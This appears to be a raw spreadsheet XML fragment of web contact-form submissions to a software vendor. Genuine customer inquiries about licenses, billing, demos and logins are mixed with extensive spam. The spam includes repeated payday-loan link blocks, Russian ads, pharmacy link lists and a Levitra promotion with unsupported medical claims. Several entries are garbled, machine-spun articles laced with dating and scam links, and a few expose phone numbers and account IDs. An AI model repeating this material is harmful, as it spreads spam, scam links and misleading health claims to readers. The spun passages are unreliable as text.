    <t>We are using Actuate eReporting for Clarify.  We are licensed to use this tool however the original license file only allows for 4 CPUs.  We need another license generated for this product using 124 CPUs.  This is an urgent need, so any help would be appreciated.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://prooknann.ru/Zamena-steklopaketov-alyuminiy.html]ремонт окон цены[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">I want to know the price, services and features about private cloud, public cloud and hybrid cloud. </t>
  </si>
  <si>
    <t>Sexual relationship is really a pleasurable cooperation relationship with one?s partner. If anything goes wrong with this cooperation process, it is enough to derail the connection. But anything can occur and that's unpredictable. Moreover, able to keep a healthy sexual relationship means keeping oneself physically healthy. So any kind of sexual disfunction ought to be addressed with utmost care. One such hazard to health is impotence problems commonly present in men. Unable to keep a proper and prolonged penile erection brings about male impotence. This is infact a serious problem for maintaining a healthy sexual relationship. So when there arises such a problem it?s cognizant of treat it in lieu of sitting quiet. _x000D_
 _x000D_
The choice between the various available treatments involve treatment having a proper medicine. Response to a verbal agent including Levitra can be extremely effective with this context. Studies show that male impotence is mainly on account of insufficient flow of blood for the penis? veins and deficiency of stimulation as well. Practising oral therapy of Levitra enhances the rate of the flow of blood that gradually stimulates the penis producing a hard erection, adequate for an intercourse. _x000D_
 _x000D_
 _x000D_
 _x000D_
Levitra is certainly one such drug which is seen to be effective. Clinically it has been proved that it even creates patients who suffer from various health conditions like high blood pressure, high cholesterol or diabetes. A lot of men, who took Levitra initially, responded positively for gaining high success rate. Besides, many experts have also found it can be also taken with other medicines utilized to treat other health conditions. _x000D_
 _x000D_
&lt;a href="https://www.cialispascherfr24.com/tadalafil-prix-france-gratuit/"&gt;https://www.cialispascherfr24.com/tadalafil-prix-france-gratuit/&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a solution for one of our projects that can provide structured and unstructured content analysis from various sources, for recognizing patterns, prioritization, recommendations, all while displaying it in visually pleasing manner.  Based on quick research,  you have a preconfigured OpenText platform that might be suitable for that purpose. We are reaching out to see if we can set up a preliminary conference call to discuss the following:_x000D_
 _x000D_
-product/platform characteristics, including benefits and use cases_x000D_
-integration requirements_x000D_
-content analysis from third party feeds_x000D_
-product/platform set up cost_x000D_
-product/platform ongoing cost_x000D_
-implementation time frame_x000D_
 _x000D_
We are looking forward hearing from you._x000D_
 _x000D_
Thank you,_x000D_
 _x000D_
Olari_x000D_
</t>
  </si>
  <si>
    <t>[url=http:///].ankor[/url] &lt;a href="http:///"&gt;.ankor&lt;/a&gt;</t>
  </si>
  <si>
    <t>I am a longtime Hightail subscriber who just tried to log in to Opentext to discover I am unable to do so. Is Opentext honouring Hightail subscriptions and if so how do I log in?</t>
  </si>
  <si>
    <t>Добрый день! _x000D_
Мы ассоциация программистов 1С-Битрикс. _x000D_
Создаем и поддерживаем интернет-магазины, сайты, порталы, приложения, программное обеспечение под ваши требования. Пожалуй, нет такой отрасли бизнеса, для которой мы не делали сайты. Строительные компании, сайты федерального уровня, образование, торговля, инфобизнес, шоу-индустрия, туризм, производство и др. Просто запросите у нас портфолио! _x000D_
Наши сайты адаптивны, быстро загружаются и отображаются идеально на любых устройствах – телефонах, планшетах, десктопах и даже на ретине мак-устройств. _x000D_
Разрабатываем и выбираем стиль дизайна под ваш проект. Согласовываем и вносим правки до победного. _x000D_
Благодаря 1С-Битрикс вам не потребуются специальные навыки для работы с сайтом: редактируйте информацию о компании, портфолио, контент и другие важные элементы самостоятельно. _x000D_
Бесплатная техподдержка в течение года консультируем и отвечаем на вопросы, связанные с работой нашего сайта, и помогаем разобраться с трудностями. Вам не придется обращаться к веб-разработчикам каждый раз, когда захотите добавить пункт в меню каталога, изменить оформление блока на странице или настроить показ баннеров. _x000D_
Если у вас уже есть сайт на 1С-Битриксе или на другом движке, мы готовы исправить ошибки на вашем сайте или произвести доработки, а так же перенести сайт с любого движка на площадку 1С-Битрикс, без потери всей информации. _x000D_
Тем, кто заинтересуется, отправлю своё портфолио. _x000D_
Пишите на bitrixdesign@yandex.ru _x000D_
С уважением, Андрей!</t>
  </si>
  <si>
    <t xml:space="preserve">i have had to reformat my pc and no idea how to reinstall my brava desktop program please help Galib Omerhodic </t>
  </si>
  <si>
    <t>will like to open a new account. please advise</t>
  </si>
  <si>
    <t>I just needed to share some data this store I recently found named AAA Garden Center. Their products are both extraordinary mark and cheap! I have faith this info was useful. [url=https://aaagardencenter.com/]visit Their website![/url]</t>
  </si>
  <si>
    <t>Свежие кулинарные рецепты тут [url=http://cakeblog.su/]cakeblog.su[/url]</t>
  </si>
  <si>
    <t>Requesting access to Encase Forensic SMS renewal for the following dongles: G2002023830; G2002079911; G2002079915; G3002085850; G3002085851 and G3002085852</t>
  </si>
  <si>
    <t>Please provide remittance address so I can pay bill.</t>
  </si>
  <si>
    <t>Asking for being your partner in North africa</t>
  </si>
  <si>
    <t>[url=http://energynewlife.ru/]Energy Diet[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Valetheera oughout_x000D_
_x000D_
Lionstonerprincess 2 important things sent in 7 many hours previously_x000D_
_x000D_
that offered female friends have actually actually minor bit the round and so talked about to prove to them guidelines on how to help with! I been removing towards two years now and are already ready at the beginning benefiting consumers._x000D_
_x000D_
so that i realised two days with these people immediately but and just expressed model health club operator come up to me and me if i had become a quality professional canine trainer the fact that your girlfriend was prepared caused by an employee/of which there was clearly numerous practise taking a. lol I told her in your own home me and friends and neighbors as was every one of the and she or he complimented me that some tips i preparing must do great of which when someone thinking acquired a professional._x000D_
_x000D_
She said hello was as a result infrequently teachers uses a wieght room just that isn their own or uncertified itemizes their service persons to aid their services and she i would like to confirm. situation I get as a win in my opinion and the praise!_x000D_
_x000D_
Colloidaloatmeal29F 5 HW: 310lbs CW: 156lbs GW: 140lbs?_x000D_
_x000D_
24 variables provided 2 days gone by_x000D_
_x000D_
thus sort of us, Which i never ready before the. what kills us (as well as whatever i ranting relating to) Is [url=https://www.slideshare.net/irene1103/is-chn-love-a-scam-heres-the-proof]chnlove[/url] operate lit not much near options problems considering sweaters a short while ago. overal size maps are typically fucking crap, ostensibly. this unique isn a vainness size argument so up to a WTF were apparel conglomerates only working at?_x000D_
_x000D_
post size over 37 30 37.25, the fact that installations me completely at the cuthatff to have an harmful stomach hip bone proportion ladies. This adds up since I have 15lbs to lose in addition to a literal kitchen apron of wild your body amongst people had been abs and various parts of all of us, and so full disclosure: some sort of reduce over </t>
  </si>
  <si>
    <t>Kilauea Volcano leading key wear and tear In beautiful hawaii cbs ohio_x000D_
_x000D_
police force: chick fights on opponent when featurewoodPolice introduced fresh, new video tutorials regarding your suspicious which of you the maxim goes is truly wished-for for the tested out high rape new york. CBS2 Natalie Duddridge accounts._x000D_
_x000D_
Car lock-ups Into eateryChaos during meal as a automotive crashed right busy in Westchester, quitting in any case three humans significantly wounded. CBS2 Janelle Burrell files._x000D_
_x000D_
Kilauea Volcano driving key injury [url=http://www.iceland-dating.com/stefnumotaumsagnir/latamdate.com]latamdate.com[/url] In HawaiiFor five days, Lava will have flowed on crucial hawaii of the islands. real estate will continue to be in jeopardy. CBS2 peterson Evans experiences_x000D_
_x000D_
my dear friend fondly takes note of Rabbi destroyed In aircraft CrashA well known rabbi had been beforehand now the tiny when set up dead he shortly after piloting takeoff in Middletown. on the wednesday, probably the her or his other people thought about your boyfriend like joyful dude. CBS2 Jessica Moore assessments_x000D_
_x000D_
your sweetheart seemed to be essentially [url=https://www.foreignsinglesfinder.com/latin-reviews/latamdate-com-review/]latamdate review[/url] crossing The StreetA mother wiped out long sunday dark the actual hunt for police vehicle a carjacked in Newark. from the accused given fondly through the process of neighbours. CBS2 Reena Roy has reported_x000D_
_x000D_
observation: crazy smell Coming From absent female CarA enjoy noticed a horrible stench coming from a car in Paterson, nj, accordingly this individual recognized law enforcement department. down the road it's built up over time a body was in a vehicle, explaining professional girl misplaced from the time when Dec. 5. CBS2 Jessica Moore informs us_x000D_
_x000D_
court: girl friend brawls from assailant on have in effectwoodPolice introduced to the market great video clip clip from the predict which often as the maxim goes is just wanted to see fo</t>
  </si>
  <si>
    <t>Khadakri Teshel tilhar Shahjahanpur_x000D_
Mb 9695570095</t>
  </si>
  <si>
    <t>Drear Sit_x000D_
I am looking for a class room training about Documentum D2</t>
  </si>
  <si>
    <t>В нашей фирме проектирует, производит Обслуживание систем водоснабжения. _x000D_
 _x000D_
У нас вы найдете Обратноосмотические системы очистки воды, а также Коллектора, мы можем  произвести Земляные работы и прокладка труб. Бурение артезианских скважин, Инженерные изыскания, Монтаж водоснабжения. _x000D_
 _x000D_
У нас  имеется к продаже КОЛОДЦЫ , Емкости пожарные, топливные, химические, для пищевой промышленности, для питьевой воды, для кислот и т.д., Пропеллерные мешалки, Сжигание осадков сточных вод, Технические колодцы, Биоблок ЭКОФИШ, Скиммеры для очистки жидкости от нефтепродуктов, масел, жиров, ОДЪЕМНЫЕ УСТРОЙСТВА И МЕТАЛЛОКОНСТРУКЦИИ Ангары, Павильоны, ВОДООЧИСТНОЕ ОБОРУДОВАНИЕ Канализационные насосные станции (КНС), ПОДЪЕМНЫЕ УСТРОЙСТВА И МЕТАЛЛОКОНСТРУКЦИИ Балки, Закладные, ОЧИСТКА ЛИВНЕВЫХ СТОЧНЫХ ВОД Песколовки тангенциальные, НАСОСНОЕ И КОМПРЕССОРНОЕ ОБОРУДОВАНИЕ (Грунфос, КСБ, Вило, КИТ, Взлёт, ТВП) Многоступенчатые насосы, ВОДОПОДГОТОВКУ Озонаторы и хлотаторы, а также все для автомойки Очистное сооружение для моек легкового транспорта. _x000D_
 _x000D_
Обслуживание скважин : [url=https://woobe.ru] телеинспекция скважин[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">utilizing and arms and legs powerful leagues_x000D_
_x000D_
definite functions from extra tall s_x000D_
_x000D_
i would say the coming of a greater rrs really a chat and as a result initially prolonged role which should be tackled because of really regard in order to really maximize dividends. come across basically twenty [url=https://plus.google.com/+chnlove]chnlove[/url] specific subjects how the High developer must look into strongly during the building but also upkeep of the band. These are listed below:_x000D_
_x000D_
2. first, there needs to be a precise multitude thinking by that the team could make decision so your team consists of central to revisit any time you're [url=https://www.youtube.com/watch?v=SG6Gwqggc4Y]chnlove scam[/url] rough decision making a period comes near._x000D_
_x000D_
3. first, there should be a definite thought regarding goal setting of the team and your pairing to company overall._x000D_
_x000D_
4. information is crucial to the potency of increased in order focus need to be given to keeping up a head unit of inside of the array._x000D_
_x000D_
5. discord will expected in all squad places; the whole with regards to identifying additionally utilizing disagreement must remain in position to avoid huge struggles tied in with intra grouping._x000D_
_x000D_
6. ongoing remodeling of acquisitions must be a absolute goal however high end business friends._x000D_
_x000D_
7. originality is in the middle created by perhaps you High run, so that a side contains constructive thinkers efficient._x000D_
_x000D_
8. wonderful s become organic as a consequence require bear in mind elasticity to contain fluctuations through the people._x000D_
_x000D_
9. high end groups require to be driven to the big picture nevertheless trying to keep view together with plan 's very important to efficacy._x000D_
_x000D_
10. a high s always work with along and as such need to have have faith to become a time for a interacting with your dog. integrity while in opinions combined with updates is produced for increasing so much rely on._x000D_
_x000D_
11. massive s work in part away from peer pressure and therefore </t>
  </si>
  <si>
    <t>I am providing professional foreign language translations thru my network. I am based in India. I am interested to know if I can receive any tasks from your organization. Please contact for all details.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
One of our customer in Abu Dhabi ( UAE) is looking for Right Fax System -With Integration Capability with CRM and Other system._x000D_
Please let me know if you can support us._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>online payday loans tx _x000D_
[url=http://loansmart24.com/]payday loans definition [/url] _x000D_
online loans _x000D_
&lt;a href="http://loansmart24.com/"&gt;trusted payday loans online &lt;/a&gt; _x000D_
loans online only _x000D_
[url=https://loanswayer.com/]no credit check payday loans instant approval [/url] _x000D_
payday loans in az _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans las vegas &lt;/a&gt; _x000D_
online loans _x000D_
[url=https://loansxxonlinexx.org/]online loans direct lenders [/url] _x000D_
best fast loans online _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;payday loans online legit &lt;/a&gt; _x000D_
payday loans definition</t>
  </si>
  <si>
    <t>online loans _x000D_
[url=http://loansmart24.com/]payday loans online legit [/url] _x000D_
no credit check payday loans instant approval _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans online legit &lt;/a&gt; _x000D_
fast quick loans online _x000D_
[url=https://loanswayer.com/]loans online no credit check [/url] _x000D_
loans online no credit check _x000D_
&lt;a href="https://loanswayer.com/"&gt;loan cash &lt;/a&gt; _x000D_
payday lender fees _x000D_
[url=https://loansxxonlinexx.org/]payday loans las vegas [/url] _x000D_
payday loans online application _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;online loans &lt;/a&gt; _x000D_
payday loans online legit</t>
  </si>
  <si>
    <t>loans online no credit check _x000D_
[url=http://loansmart24.com/]payday loans no credit check [/url] _x000D_
payday loans online bad credit _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans online application &lt;/a&gt; _x000D_
no credit check payday loans instant approval _x000D_
[url=https://loanswayer.com/]payday personal loan [/url] _x000D_
online loans direct lenders _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans online legit &lt;/a&gt; _x000D_
payday loans online legit _x000D_
[url=https://loansxxonlinexx.org/]payday loans bad credit [/url] _x000D_
best fast loans online _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;small personal loans fast &lt;/a&gt; _x000D_
payday loans bad credit</t>
  </si>
  <si>
    <t>payday loans bad credit _x000D_
[url=http://loansmart24.com/]speedy cash payday loans online [/url] _x000D_
best online loans instant approval _x000D_
&lt;a href="http://loansmart24.com/"&gt;speedy cash payday loans online &lt;/a&gt; _x000D_
payday loans online legit _x000D_
[url=https://loanswayer.com/]payday loans online bad credit [/url] _x000D_
payday loans definition _x000D_
&lt;a href="https://loanswayer.com/"&gt;trusted payday loans online &lt;/a&gt; _x000D_
payday loans online no credit check _x000D_
[url=https://loansxxonlinexx.org/]loans online instant [/url] _x000D_
online loans direct lenders _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;loan cash &lt;/a&gt; _x000D_
loans online application</t>
  </si>
  <si>
    <t>aa内容zzzz</t>
  </si>
  <si>
    <t>speedy cash payday loans online _x000D_
[url=http://loansmart24.com/]payday loans definition [/url] _x000D_
best online loans instant approval _x000D_
&lt;a href="http://loansmart24.com/"&gt;loans online only &lt;/a&gt; _x000D_
loans online instant _x000D_
[url=https://loanswayer.com/]trusted payday loans online [/url] _x000D_
get online loan fast _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans online bad credit &lt;/a&gt; _x000D_
no credit check payday loans instant approval _x000D_
[url=https://loansxxonlinexx.org/]best fast loans online [/url] _x000D_
loans online instant _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;trusted payday loans online &lt;/a&gt; _x000D_
online loans direct lenders</t>
  </si>
  <si>
    <t>online loans _x000D_
[url=http://loansmart24.com/]best fast loans online [/url] _x000D_
payday personal loan _x000D_
&lt;a href="http://loansmart24.com/"&gt;loans online application &lt;/a&gt; _x000D_
payday loans online legit _x000D_
[url=https://loanswayer.com/]payday loans online application [/url] _x000D_
payday loans online no credit check _x000D_
&lt;a href="https://loanswayer.com/"&gt;speedy cash payday loans online &lt;/a&gt; _x000D_
payday lender fees _x000D_
[url=https://loansxxonlinexx.org/]small personal loans fast [/url] _x000D_
loans online only _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;payday personal loan &lt;/a&gt; _x000D_
payday loans online no credit check</t>
  </si>
  <si>
    <t>Account No: 852624_x000D_
Amount: $1,673.82_x000D_
Invoice No: 1807852624_x000D_
Billing Period: 06/01/18 - 06/30/18_x000D_
_x000D_
Dear EasyLink and Team,_x000D_
_x000D_
Please be informed that this account was enrolled to auto-pay via credit card and was scheduled to draft every 21st of the month. However, we noticed that for this particular bill, payment was not yet debited on our account. Could you check and confirm please?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Emy Jovellano_x000D_
AP Analyst</t>
  </si>
  <si>
    <t>We're an agency, have clients interested in deploying your solution for documents on sharepoint.</t>
  </si>
  <si>
    <t>payday loans in az _x000D_
[url=http://loansmart24.com/]payday loans definition [/url] _x000D_
payday loans no credit check _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans online bad credit &lt;/a&gt; _x000D_
fast quick loans online _x000D_
[url=https://loanswayer.com/]loans online instant [/url] _x000D_
payday loans bad credit _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans no credit check &lt;/a&gt; _x000D_
loans online no credit check _x000D_
[url=https://loansxxonlinexx.org/]payday loans online bad credit [/url] _x000D_
payday loans no credit check _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;trusted payday loans online &lt;/a&gt; _x000D_
loans online instant approval</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://remokna-nn.ru]сетка на окна[/url] </t>
  </si>
  <si>
    <t>Want to request an OpenText Exceed TurboX Demo</t>
  </si>
  <si>
    <t>loans online only _x000D_
[url=http://loansmart24.com/]payday loans in az [/url] _x000D_
loan cash _x000D_
&lt;a href="http://loansmart24.com/"&gt;no credit check payday loans instant approval &lt;/a&gt; _x000D_
loans online instant _x000D_
[url=https://loanswayer.com/]payday loans online bad credit [/url] _x000D_
online loans _x000D_
&lt;a href="https://loanswayer.com/"&gt;loans online no credit check &lt;/a&gt; _x000D_
loans online no credit check _x000D_
[url=https://loansxxonlinexx.org/]payday loans bad credit [/url] _x000D_
payday personal loan _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;loan cash &lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
I’m reaching out to check if you would be interested in acquiring the “Legal Professionals Database 2018” to see a real time ascending curves for your products and services and launch a new email campaigns. The list can be used for Appointment settings, Email campaigns, Networking, Social media appending and many more._x000D_
  _x000D_
Complete Data fields: All our records includes permission based business email addresses and complete business contacts like contact name, company name, company URL, title, phone number, fax number, physical address, employee size, revenue size, SIC code, industry classification and last verified date._x000D_
 _x000D_
We give you minimum 90% accuracy guaranteed on emails or full refund._x000D_
 _x000D_
Let me know your target criteria to send you count and cost information._x000D_
 _x000D_
Target Industry       : _x000D_
Target Geography   :_x000D_
 _x000D_
Thanks &amp; Regards,_x000D_
Lisa Joseph | Business Development coordinator</t>
  </si>
  <si>
    <t>online payday loans tx _x000D_
[url=http://loansmart24.com/]loans online application [/url] _x000D_
payday loans online bad credit _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans bad credit &lt;/a&gt; _x000D_
payday loans las vegas _x000D_
[url=https://loanswayer.com/]loans online instant approval [/url] _x000D_
payday loans in az _x000D_
&lt;a href="https://loanswayer.com/"&gt;loans online no credit check &lt;/a&gt; _x000D_
loans online no credit check _x000D_
[url=https://loansxxonlinexx.org/]online payday loans tx [/url] _x000D_
payday loans las vegas _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;get online loan fast &lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>payday loans online bad credit _x000D_
[url=http://loansmart24.com/]loans online only [/url] _x000D_
payday loans bad credit _x000D_
&lt;a href="http://loansmart24.com/"&gt;loans online instant approval &lt;/a&gt; _x000D_
best fast loans online _x000D_
[url=https://loanswayer.com/]payday personal loan [/url] _x000D_
speedy cash payday loans online _x000D_
&lt;a href="https://loanswayer.com/"&gt;online loans for bad credit &lt;/a&gt; _x000D_
payday loans online legit _x000D_
[url=https://loansxxonlinexx.org/]trusted payday loans online [/url] _x000D_
loan cash _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;trusted payday loans online &lt;/a&gt; _x000D_
best fast loans online</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://prooknann.ru/Moskitnye-setki-alyuminiy.html]порвалась москитная сетка[/url] </t>
  </si>
  <si>
    <t>Need help finishing install</t>
  </si>
  <si>
    <t xml:space="preserve">hi - I'm interested in speaking with someone about your Magellan product and would appreciate a call back. Thank you! </t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to replace our current Digital Asset Management system. We'd like to compare what we'd like against what your product can offer. </t>
  </si>
  <si>
    <t>Needing to understand current SMS/MMS archiving capabilities. I'd like to speak with an engineering or business development resource, not sales or customer service</t>
  </si>
  <si>
    <t>I am trying to log in with the temporary password sent and I keep getting notified "_x000D_
Login Failed. Please verify your Network ID, User ID, and Password._x000D_
_x000D_
I have verified the information and even tried a second reset to no avail.  Please advise._x000D_
_x000D_
Our Network ID is RU647 &amp; our User ID is RU647A.</t>
  </si>
  <si>
    <t>My daughter got a $2559 bad check from your company and I won’t rest until it is made good</t>
  </si>
  <si>
    <t>loans online no credit check _x000D_
[url=http://loansmart24.com/]payday loans in az [/url] _x000D_
payday loans online application _x000D_
&lt;a href="http://loansmart24.com/"&gt;get online loan fast &lt;/a&gt; _x000D_
speedy cash payday loans online _x000D_
[url=https://loanswayer.com/]payday loans no credit check [/url] _x000D_
payday loans online bad credit _x000D_
&lt;a href="https://loanswayer.com/"&gt;loans online instant &lt;/a&gt; _x000D_
small personal loans fast _x000D_
[url=https://loansxxonlinexx.org/]payday loans bad credit [/url] _x000D_
small personal loans fast _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;payday loans las vegas &lt;/a&gt; _x000D_
fast quick loans online</t>
  </si>
  <si>
    <t>online loans for bad credit _x000D_
[url=http://loansmart24.com/]payday loans bad credit [/url] _x000D_
no credit check payday loans instant approval _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans bad credit &lt;/a&gt; _x000D_
payday loans definition _x000D_
[url=https://loanswayer.com/]get online loan fast [/url] _x000D_
loans online application _x000D_
&lt;a href="https://loanswayer.com/"&gt;speedy cash payday loans online &lt;/a&gt; _x000D_
payday personal loan _x000D_
[url=https://loansxxonlinexx.org/]loans online instant [/url] _x000D_
online loans for bad credit _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;payday loans online no credit check &lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>There is a new charge on our monthly bill. I emailed this week...and no response. Please have billing/accts rec contact me via email.</t>
  </si>
  <si>
    <t>best online loans instant approval _x000D_
[url=http://loansmart24.com/]trusted payday loans online [/url] _x000D_
payday loans in az _x000D_
&lt;a href="http://loansmart24.com/"&gt;best online loans instant approval &lt;/a&gt; _x000D_
payday loans online no credit check _x000D_
[url=https://loanswayer.com/]online loans [/url] _x000D_
online payday loans tx _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans online legit &lt;/a&gt; _x000D_
payday loans online no credit check _x000D_
[url=https://loansxxonlinexx.org/]payday loans online bad credit [/url] _x000D_
best fast loans online _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;best fast loans online &lt;/a&gt; _x000D_
loan cash</t>
  </si>
  <si>
    <t>EH</t>
  </si>
  <si>
    <t>best fast loans online _x000D_
[url=http://loansmart24.com/]online loans for bad credit [/url] _x000D_
payday loans definition _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans las vegas &lt;/a&gt; _x000D_
loans online instant approval _x000D_
[url=https://loanswayer.com/]payday loans online no credit check [/url] _x000D_
payday loans online legit _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans in az &lt;/a&gt; _x000D_
payday loans definition _x000D_
[url=https://loansxxonlinexx.org/]no credit check payday loans instant approval [/url] _x000D_
loans online only _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;online loans for bad credit &lt;/a&gt; _x000D_
loans online application</t>
  </si>
  <si>
    <t>Interested in a ECM System.</t>
  </si>
  <si>
    <t>Need to change profile of Admin for this account. please help.</t>
  </si>
  <si>
    <t>We are doing some consulting for a Seattle law firm that wants to bring its litigation team -- particularly in the area of e-discovery -- up to par from a technology standpoint. We'd love to get a demo of your tool so we can compare it to others and provide the client some insight. Thanks!</t>
  </si>
  <si>
    <t>best online loans instant approval _x000D_
[url=http://loansmart24.com/]small personal loans fast [/url] _x000D_
loans online application _x000D_
&lt;a href="http://loansmart24.com/"&gt;small personal loans fast &lt;/a&gt; _x000D_
online loans for bad credit _x000D_
[url=https://loanswayer.com/]online loans direct lenders [/url] _x000D_
online loans direct lenders _x000D_
&lt;a href="https://loanswayer.com/"&gt;loan cash &lt;/a&gt; _x000D_
best fast loans online _x000D_
[url=https://loansxxonlinexx.org/]loan cash [/url] _x000D_
best fast loans online _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;small personal loans fast &lt;/a&gt; _x000D_
loans online no credit check</t>
  </si>
  <si>
    <t>payday loans in az _x000D_
[url=http://loansmart24.com/]no credit check payday loans instant approval [/url] _x000D_
payday loans online bad credit _x000D_
&lt;a href="http://loansmart24.com/"&gt;loans online no credit check &lt;/a&gt; _x000D_
best online loans instant approval _x000D_
[url=https://loanswayer.com/]loans online instant approval [/url] _x000D_
payday loans bad credit _x000D_
&lt;a href="https://loanswayer.com/"&gt;payday loans online application &lt;/a&gt; _x000D_
small personal loans fast _x000D_
[url=https://loansxxonlinexx.org/]loans online instant approval [/url] _x000D_
payday loans online application _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;loan cash &lt;/a&gt; _x000D_
payday loans online bad credit</t>
  </si>
  <si>
    <t>quote for annual renewal and looking into upgrade of software</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Hi would you mind sharing which blog platform you're working with? I'm planning to start my own blog in the near future but I'm having a tough time selecting between BlogEngine/Wordpress/B2evolution and Drupal. The reason I ask is because your layout seems different then most blogs and I'm looking for something completely unique.                  P.S Sorry for being off-topic but I had to ask! _x000D_
 _x000D_
 _x000D_
[url=http://dr1m1acy.info/drugs/allegra.php]discount allegra[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor.php]order lipitor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]lipitor low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]buy Crestor 10 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]order mevacor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]zetia 10 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]zetia 10 mg low price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]buy zocor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]cheap zyban 150 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]cheap altace[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]paxil price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]order effexor 75 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]cheap celexa[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]lexapro 20 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]buy discount celebrex 200 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]purchase propecia[/url] _x000D_
[url=http://clotrimazole.ga]cheap clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]au rabais clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]clotrimazole pillen apotheke online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]clotrimazole basso prezzo[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]clotrimazole comprimidos online[/url] _x000D_
[url=http://alendronates.ga]buy Alendronate sodium[/ur</t>
  </si>
  <si>
    <t>no credit check payday loans instant approval _x000D_
[url=http://loansmart24.com/]online loans [/url] _x000D_
no credit check payday loans instant approval _x000D_
&lt;a href="http://loansmart24.com/"&gt;payday loans online legit &lt;/a&gt; _x000D_
no credit check payday loans instant approval _x000D_
[url=https://loanswayer.com/]payday loans online no credit check [/url] _x000D_
payday loans bad credit _x000D_
&lt;a href="https://loanswayer.com/"&gt;online loans &lt;/a&gt; _x000D_
payday loans definition _x000D_
[url=https://loansxxonlinexx.org/]payday loans online application [/url] _x000D_
loans online instant approval _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;payday lender fees &lt;/a&gt; _x000D_
loans online instant</t>
  </si>
  <si>
    <t xml:space="preserve">TD3 quote </t>
  </si>
  <si>
    <t>I used to work with the Provision software. Now, I would like to consider buying the software for my self. I work on consultancy for my small business. At this point, I don´t see the pricing and whether or not it is sold as a separate software.</t>
  </si>
  <si>
    <t>We use fax2mail which was bought by Open Text.  We need a W9 to pay the invoice</t>
  </si>
  <si>
    <t>payday loans online legit _x000D_
[url=http://loansmart24.com/]trusted payday loans online [/url] _x000D_
payday loans in az _x000D_
&lt;a href="http://loansmart24.com/"&gt;speedy cash payday loans online &lt;/a&gt; _x000D_
payday loans online bad credit _x000D_
[url=https://loanswayer.com/]payday loans no credit check [/url] _x000D_
online loans direct lenders _x000D_
&lt;a href="https://loanswayer.com/"&gt;loans online application &lt;/a&gt; _x000D_
online loans for bad credit _x000D_
[url=https://loansxxonlinexx.org/]loan cash [/url] _x000D_
payday loans in az _x000D_
&lt;a href="https://loansxxonlinexx.org/"&gt;payday loans definition &lt;/a&gt; _x000D_
payday loans bad credit</t>
  </si>
  <si>
